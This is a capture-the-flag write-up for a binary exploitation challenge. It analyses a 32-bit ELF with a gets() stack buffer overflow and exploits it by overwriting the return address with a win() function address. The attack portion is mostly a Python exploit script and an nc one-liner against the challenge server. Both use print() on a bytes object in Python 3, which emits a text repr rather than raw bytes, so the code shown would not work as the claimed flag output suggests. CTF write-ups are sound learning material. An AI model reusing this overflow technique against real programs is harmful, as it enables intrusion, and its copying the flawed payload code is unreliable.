197 words
1 minute
SCSC2026 Quals - dzawin - Binary Exploitation Writeup
Category: Binary Exploitation
Server: nc 43.128.69.211 13005
Flag: scsc26{r3t2wIn_f0r_fUn_4nD_pr0ViT}
Challenge Description
Classic buffer overflow with a win function.
Binary Analysis
$ file stackstack: ELF 32-bit LSB executable, Intel 80386, dynamically linked, not stripped
$ checksec --file=stack Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)Key Functions
win() @ 0x080491c2
void win() { FILE *fp = fopen("flag.txt", "r"); if (!fp) { perror("Error while opening the file."); exit(1); } int c; while ((c = fgetc(fp)) != EOF) { putchar(c); }}vuln() @ 0x0804921f
vuln: push ebp mov ebp, esp sub esp, 0x80 ; 128-byte buffer lea eax, [ebp-0x80] ; buffer address push eax call gets ; VULNERABLE! leave retStack Layout
[ 128 bytes buffer ] <- ebp-0x80 (gets writes here)[ 4 bytes saved EBP ] <- ebp[ 4 bytes return addr ] <- ebp+4 (overwrite target)Exploitation Strategy
-
Fill 128-byte buffer with padding
-
Overwrite 4-byte saved EBP with junk
-
Overwrite return address with
win()address (0x080491c2)
Total padding needed: 128 + 4 = 132 bytes
Exploit
# !/usr/bin/env python3import struct
padding = b'A' * 132 # 128 buffer + 4 saved ebpwin_addr = struct.pack('<I', 0x080491c2) # little-endian
payload = padding + win_addrprint(payload)One-liner:
python3 -c "import struct; print(b'A'*132 + struct.pack('<I', 0x080491c2))" | nc 43.128.69.211 13005Output
scsc26{r3t2wIn_f0r_fUn_4nD_pr0ViT} SCSC2026 Quals - dzawin - Binary Exploitation Writeup
https://fuwari.vercel.app/posts/17/scsc2026-quals-dzawin-binary-exploitation-writeup/